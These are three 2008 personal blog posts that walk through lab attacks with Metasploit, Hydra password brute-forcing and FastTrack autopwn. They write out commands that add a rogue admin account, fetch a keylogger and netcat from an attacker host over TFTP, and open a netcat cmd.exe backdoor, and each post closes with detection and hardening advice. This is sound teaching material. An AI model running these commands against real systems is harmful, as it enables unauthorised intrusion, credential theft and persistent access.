Tuesday, February 19, 2008

Metasploit Basics

I have recently started to use Metasploit, primarily the msfconsole, and in this blog entry I want to list some of the commands I used to get up and running with the basics. Although Metasploit includes an excellent set of pdf's in the documentation folder I found that by going through the steps listed below I really gained an understanding of the usage of the msfconsole and the uses of the msfconsole.

Metasploit is an exploitation framework that is open source and very extensible. It uses modules for exploits, payloads, auxiliary tools, encoders and nops. At the time of writing this blog entry there are 269 remote code exploits and more can be added from additional sources or created. These exploits can target platforms such as Windows, Linux, Cisco, the iphone and several 3rd party applications.

Below I will list a few basics that I found useful when finding my way around Metasploit and I will end the post by demonstrating an attack on a host and then looking at the host for some signs of the attack.


Tools

  • Metasploit 3.1
  • nmap


The Basics

1. I downloaded the latest version of Metasploit from the website. I also grabbed a version using svn just encase there were any additional modules.

svn co http://metasploit.com/svn/framework3/trunk/

2. I renamed the trunk to metasploit3.1 (this is just to make things tidier).

3. Although I could have used the web based GUI i wanted to get to grips with the console instead. I launched ./msfconsole and was greeted by the banner which lists the amount of modules included.



4. From the prompt ? will list the available options.



5. From within the console I typically use the following commands:

show all

This will show me expolits, payloads, auxiliary tools, encoders, NOP generators. If I want to view just one section I can pick the specific option, such as:

show exploits

Within the list of exploits I may see one that looks interesting and I want to know a little more about it. Now i will use the "info {exlpoit name} to get further information on what the exploit does and what options I will need to configure.

info windows/smb/psexec



Note: Tab completion works well within Metasploit, as does copy and paste.

6. Looking at the Basic options I can see that some are required and some are not. Also, some options are populated, these can be left or changed using the "set" and "unset" commands.

I can set these options as well as others in the global datastore (using the setg command), or the module datastore (using the set command). The difference being that global datastore settings can be used for different modules and may save time.

Below I set the global datastore up for some common variables and then verify them using "setg"

setg LHOST 192.168.1.204
setg LPORT 4445

setg



7. If I want to search the modules or exploits within Metasploit for a particular string I use the "search" command. Below I search for MSSQL.

search MSSQL




6. After selecting an exploit for a vulnerable target I will want to choose a payload. Payloads are what you want to happen once your target is exploited, so do you want a remote shell? a VNC session? Do you want to add a user? Do you want to upload a tool?

To show all payloads I use the command:

show payloads

I see a list of the available payloads for this exploit on this platform. If had wanted to see all payloads I could have used the "back" command to come out of the exploit and then the "show payloads" to view all payloads, however in this case I just want to view payloads that I can use for my chosen exploit.

I have a pretty good idea which one I want but i use info again to see if it does what I want it to do.

info linux/x86/shell/reverse_tcp



If I'm satisfied that th exploit is what I need I would then use the command below to select the payload:

use payload linux/x86/shell/reverse_tcp


Auxiliary tools

As well as payloads and exploits another useful set of modules are the Auxiliary Tools. These encompass tools such as scanners, Fake Wifi AP's, SQL scanners etc..

These can be viewed using the "show auxiliary" command.



Auxiliary tools can be selected using the "use {auxiliary-tool-name}" command and then options can be viewed and set using the "show options" and "set" commands.

Below is an example of choosing an auxiliary tool, viewing the options, setting the required options and then running the tool against a web server.

use scanner/http/version
show options
set RHOSTS 192.168.1.5
show options
exploit



Okay. Lets put some more of this together.


Squid Attack

In the example below I will simply cover the steps to locate and attack a host.

1. Locate my target and scan using nmap.



I see that my target is a Linux host and i can see the services that it has running and are accessible.

2. I search Metasploit for what Linux modules it has.

search linux



I can see from the output that it has an exploit for squid. Well thats handy because my target is running squid on port 3128.


3. I'll now set choose the squid exploit and set my variables and then verify them.

use linux/proxy/squid_ntlm_authenticate
setg RHOST 192.168.1.203
setg RPORT 3128
setg LHOST 192.168.1.204
set



4. Now I want to choose and configure my payload. Using the "show payloads" command now will display compatible payloads for the exploit i have chosen. And as I'm not quite sure which payload I want I'll use the "info" command.

show payloads
info linux/x86/shell_reverse_tcp




5. This is the payload I want, so i select it and I can see that I have set all the variables I need from looking at the options.

set payload linux/x86/shell_reverse_tcp
show options




6. Now i'm happy with my settings I fire my exploit and see how it goes.

exploit



My exploit failed. lets look at why and what I could have done differently or how I could have foreseen the failure and maybe not launched a pointless attack at all.


What Went Wrong

1. Taking a close look at the squid version reveals that my target is using Squid webproxy 2.6.STABLE14.

nmap 192.168.1.203 -T 5 -sV -p 3128




2. If I had taken the time to closely look at the exploit I want to launch I would have used the "info" command.

info linux/proxy/squid_ntlm_authenticate



Looking at the references section on the info a number of links are provided. If I had taken the time to follow these links and examine the information I would have seen that the version of squid that I launched my exploit at is not vulnerable.


3. Now if I was a good admin and I was monitoring my logs I would see that I have had some sort of attack launched at me. This then puts me on my guard.

Below is a sample from the squid logs.

cat /var/log/squid/access.log



As an attacker I do not want to alert an admin just because I didn't read up on the details of an exploit.


Links

Saturday, February 9, 2008

Password Attacks

The purpose of this post is to demonstrate how an attacker may use free tools to bruteforce passwords and gain access to sensitive information.

The tools I use in this example are from BackTrack3.

Tools

  • Backtrack
  • NMap
  • HydraGTK (using John's wordlist)
  • Medusa
  • snmpcheck.pl

The Attack

1. If I don't already have a list of targets and services I would use nmap to scan for services and systems that I know I can perform an attack against.

nmap 192.168.2.2 -T 4 -sV -P0 -n



Remember, In an attack scenario it is can be a good idea to scan only those services that you have working exploits for or that you know your tools can run password lists against.

2. Following a rather unstealthy scan I see that my target has a FTP Server and some NETBIOS ports open (139 & 445). These service are perfect for my tools, I know that I can peform a bruteforce attack on either one.

Listed below are all the protocols and services that Hydra can perform attacks against:

TELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY,
HTTP-PROXY-NTLM, HTTP-FORM-GET HTTP-FORM-POST, HTTPS-FORM-GET,
HTTPS-FORM-POSTLDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES,
POP3-NTLM, IMAP, IMAP-NTLM, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth,
Cisco enable, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, Cisco AAA,
REXEC, SOCKS5, VNC, POP3 and VMware-Auth

Either using hydra (commandline) or HydraGTK (GUI) I enter a known or likely username or specify a list of valid or likely usernames if I have them (there is more on this in the following SNMP section).




3. Now I enter the IP or name of your target and I select a service that was available on the target when I performed my nmap scan. I have chosen ftp for this example.




4. Now I give hydra a wordlist. I have just given it johns wordlist here (on BackTrack3 in /usr/local/john-1.7.2/password.lst) For better results I would usually give hydra a bigger list. I have also chosen to try null passwords and try the username as the password.



5. The next tab gives me options for tuning Hydra. I can tell Hydra to stop checking after is has found a match, this may restrict the number of valid usernames and passwords found but it will be quieter. Proxy settings can also be set here.



6. Specific options can be set on the next tab.



7. Now I have all my settings configured I kick it off and await the joy.



Any results can be save to a file.


If I had wanted to perform the same attack from the commandline I would have used the following syntax:

hydra 192.168.2.2 -l administrator -P /usr/local/john-1.7.2/password.lst -t 36



Obviously this is slightly quicker but the GUI is fun and useful to become familiar with Hydra.

Below is another successful attack on the smb protocol (port 139)




SNMP

Supposing I don't have any username but I find that port 161 UDP is open? Well that usually means that SNMP is up. Hydra can then be used to bruteforce the SNMP community strings and if successful I can get to the entire config on the server including a complete list of users. Here's how.


The Attack

1. I configure hydra with no username and as a password i use "public" which is the default. If that fails I give hydra a password list to try.



2. Following a successful guess I use the SNMP string with another tool from BackTrack called snmpcheck.pl

./snmpcheck-1.6.pl -t 192.168.2.2 -c secret -l -v 2



This tool will now pull down all the info on my target and i can extract the user names into a file to feed back into Hydra as valid usernames




How To Protect Yourself

Having an account lockout policy is one protection available, but I often wonder if after several attacks someone would get pissed off with locked out accounts and remove the policy.

Also, SNMP should not use the default community strings and can be locked down so only certain devices talk to each other. SNMP traffic can also be encrypted.

Another weakness this tool exploits is weak passwords. If users have strong passwords they may still be cracked however, the attacker may need to get a little noisier and you may just see him in the logs. You are checking the logs aren't you?

Oh, and one last thing on passwords. Remember to change the default passwords on all devices.

Note: I will update this post with other useful tools as i find time.

Friday, February 8, 2008

Remote Exploitation

The purpose of this blog entry is to demonstrate how easy it is for an attacker to use freely available tools to exploit servers and gain root (administrative) access. I also look at how this attack might have been spotted from the defenders point of view and what could have been done to prevent it.

Tools

  • Backtrack3
  • TCPDump
  • Nmap
  • FastTrack
  • Netcat
Below I will list the steps I took to own the server, plant a keylogger and a backdoor, and then set up the backdoor. This is a very basic attack and my aim is to demonstrate how an attacker with a relatively low skill level can succeed in exploiting your box.

I'll be using FastTrack as my primary tool to gain root. FastTrack is kind of like a front-end for Metasploit, but it is quite automated and just throws all the exploits at a target and builds a nice database as it goes. So it is very noisy and has a greater chance of crashing the target. Once finished it lists the sessions ready for the attacker to connect to.


The Attack

1. I start up a sniffer to see whats about and I discover a host that may be fun to play with. This was done using TCPdump.

tcpdump -i eth0 -vv



2. On the discovered host I use nmap to verify the open ports and the listening services. I just let nmap use the default port list rather than specifying a range at this time.

nmap 192.168.2.2 -T 4 -sV -P0 -n



3. After loading up FastTrack I select the "External Hackin" option.

4. Next I select "Autopwn Metasploit Automated" & enter the IP of my target.



5. I choose the database type of sqlite3. When prompted to update Metasploit I select "No" because i'm in a lab and i have no internet access. FastTrack goes to work and does it's noisy magic.



6. FastTrack has found 2 vulnerabilities that it has successfully exploited. Using the sessions -l command I can see these listed.



7. I pick a session and use it to connect to the server and I use the "whoami" command to verify that I am logged in as a system account with admin privileges.



8. I now go and add a new user and give the account admin rights using the "net user" and "net localgroup" commands.

net user synjunkie Password123 /add
net localgroup Administrators synjunkie /add



9. If I want a nice GUI I use RDP to connect to the host.



And now i can begin to look around my target and if necessary set up other back doors.




10. And if i want to get my tools onto the box to set the backdoor up or log keystrokes it's no problem. I set up a TFTP Server on my attacking box and use windows built in "tftp" command to pull across some tools.

tftp -i 192.168.2.1 GET klogger.exe
tftp -i 192.168.2.1 GET nc.exe




11. For my backdoor i create a netcat listener and shovel a shell back to whoever connects to it.

nc -p 6666 -L -e cmd.exe



To maintain access I could either use the "reg" command to create a registry entry to auto-start my backdoor at each reboot, or create a batch file and put it in the startup folder.

And on the attackers box I connect to my newly created backdoor.

nc 192.168.2.2 6666




owned!




Detection & Lessons Learned

1. The Server was behind on it's patches. Patching is fundamental to securing a system.

2. The Server had loads of listening services. Were all these services necessary? if not shut them down.

3. A new account was added to an administrator group. The Administrators group should always be closely monitored for unathorised changes.



4. From analysing the logs this attack was very noisy and could have easily have been detected.

Below are screenprints of the ftp and web logs. It is evident from these that an attack has taken place.



More tell-tale logs!



And the screenshot below shows that unauthorised entry has occurred.



However, this is after the attack and the damage could have already been done. Any decent attacker will also modify or delete logs so setting up a syslog server that is hardened is a good idea. Most Admins will set up a syslog server not realising that it needs hardening, as it will be critical to you in the event of an attack and can provide valuable information to help you identify the source of the attack and also help you learn from it to better protect your systems in the future.

So to recap:

> Patch computers regularly
> Analyse logs
> Have policies and procedures to help identify suspicious accounts and activities.